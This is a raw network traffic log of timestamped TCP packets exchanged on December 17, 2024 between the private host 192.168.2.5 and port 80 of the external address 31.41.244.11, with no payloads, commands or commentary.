Dec 17, 2024 06:03:31.544790030 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.544790030 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.545759916 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.545912027 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.545983076 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.545983076 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.546857119 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.546981096 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.547096968 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.547729969 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.547940969 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.548005104 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.548022985 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.548579931 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.549048901 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.549177885 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.549226999 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.549226999 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.550147057 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.550256014 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.550307989 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.550890923 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.551240921 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.551337004 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.551362038 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.551422119 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.552350044 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.552411079 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.552460909 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.552515030 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.553440094 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.553489923 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.553555965 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.553616047 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.554533005 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.554611921 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.554697990 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.555248976 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.555655956 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.555794001 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.555819988 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.555984020 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.556715965 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.556845903 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.556853056 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.557054996 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.557841063 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.557948112 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.558170080 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.558931112 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.559015989 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.559048891 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.559221029 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.560034037 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.560182095 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.560295105 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.561130047 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.561184883 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.561243057 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.561425924 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.562217951 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.562330961 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.562360048 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.563287020 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.563345909 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.563345909 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.563395977 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.563811064 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.564554930 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.564753056 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.565480947 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.565522909 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.565608978 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.566570997 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.566570997 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.566608906 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.566724062 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.566750050 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.566772938 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.567737103 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.567816019 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.567851067 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.568835020 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.568947077 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.568984032 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.569026947 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.569936037 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.570028067 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.570029020 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.570234060 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.571014881 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.571147919 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.571279049 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.571279049 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.572189093 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.572257042 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.572499990 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.573451042 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.573467016 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.573664904 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.573664904 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.574299097 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.574587107 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.574894905 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.575479031 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.575572968 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.575593948 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.575675011 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.576630116 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.576647997 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.576759100 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.577656984 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.577713966 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.578063011 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.578063011 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.578695059 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.578794956 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.578872919 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.578872919 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.579807997 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.579855919 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.579941988 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.580931902 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.581024885 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.581178904 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.581178904 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.582009077 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.582039118 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.582408905 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.582408905 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.583081007 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.583189964 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.583307028 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.584172964 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.584331036 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.584394932 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.585241079 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.585488081 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.720659971 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.720680952 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.720696926 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.720712900 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.720942974 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.720942974 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.721299887 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.721416950 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.721462011 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.721570969 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.722393990 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.722482920 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.722567081 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.722745895 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.723411083 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.723589897 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.723707914 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.723707914 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.724684954 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.724701881 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.724771976 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.725603104 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.725712061 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.725789070 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.725852013 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.726860046 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.726990938 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.727185965 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.727185965 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.727935076 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.728034973 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.728084087 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.728233099 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.729001999 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.729171038 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.729192019 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.729490995 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.730150938 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.730173111 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.730218887 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.731179953 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.731302023 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.731352091 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.731535912 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.732242107 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.732424021 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.732773066 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.733274937 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.733324051 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.733467102 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.733511925 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.734395027 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.734545946 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.734565020 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.734939098 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.735656023 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.735800982 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.735826969 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.735959053 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.736953974 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.737119913 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.737131119 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.737330914 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.737659931 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.737728119 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.737843037 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.738035917 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.738852978 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.738869905 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.738895893 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.738965988 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.739957094 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.740118027 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.740139961 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.740770102 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.741110086 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.741127014 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.741277933 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.741277933 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.742109060 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.742430925 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.742501974 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.743233919 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.743340015 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.743381977 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.743596077 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.744227886 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.744554996 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.744645119 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.745486021 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.745645046 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.745667934 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.745857954 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.746649981 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.746665955 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.746848106 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.746848106 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.747634888 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.747649908 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.747778893 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.748730898 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.748907089 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.748909950 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.748963118 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.749864101 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.749957085 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.750020981 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.750093937 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.751012087 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.751028061 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.751079082 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.751079082 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.751883984 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.752182961 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.752365112 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.752960920 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.753119946 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.753135920 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.753175974 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.755059958 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.755095005 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.755124092 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.755363941 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.756017923 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.756114006 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.756179094 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.756247997 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.756331921 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.756373882 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.756634951 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.756717920 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.757667065 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.757700920 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.757752895 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.757752895 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.758599043 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.758645058 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.758744955 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.758842945 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.759846926 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.759882927 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.760633945 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.760751009 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.761418104 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.761418104 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.761418104 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.761727095 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.761869907 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.761976957 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.761976957 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.762820959 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.762917042 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.763341904 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.763564110 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.763906956 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.764039040 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.764081001 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.764081001 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.765038013 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.765141964 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.766258955 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.766309023 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.766309023 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.766309023 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.766333103 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.766377926 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.767208099 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.767302990 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.767343044 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.767343044 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.768326044 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.768435955 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.768479109 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.768479109 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.769426107 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.769577980 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.770522118 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.770580053 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.770580053 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.770580053 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.770636082 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.771351099 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.771624088 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.771735907 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.771811962 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.771811962 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.772706985 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.772825956 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.772871017 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.772871017 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.773871899 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.773973942 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.774003983 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.774600983 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.774909019 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.774993896 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.775027990 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.775028944 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.776021957 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.776158094 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:31.776420116 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:31.776420116 CET	49882	80	192.168.2.5	31.41.244.11
